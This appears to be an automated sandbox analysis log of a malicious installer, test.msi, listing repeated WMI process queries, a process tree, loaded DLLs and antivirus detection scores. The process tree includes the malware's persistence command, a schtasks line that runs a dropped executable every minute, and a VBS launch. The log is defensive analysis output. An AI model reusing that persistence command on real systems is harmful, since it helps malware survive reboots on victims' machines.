                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\Installer\MSI77F6.tmpFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: test.msiReversingLabs: Detection: 57%
                Source: test.msiVirustotal: Detection: 61%
                Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\test.msi"
                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI77F6.tmp "C:\Windows\Installer\MSI77F6.tmp"
                Source: C:\Windows\Installer\MSI77F6.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Installer\MSI77F6.tmpProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI77F6.tmp "C:\Windows\Installer\MSI77F6.tmp"Jump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1Jump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbsJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1Jump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
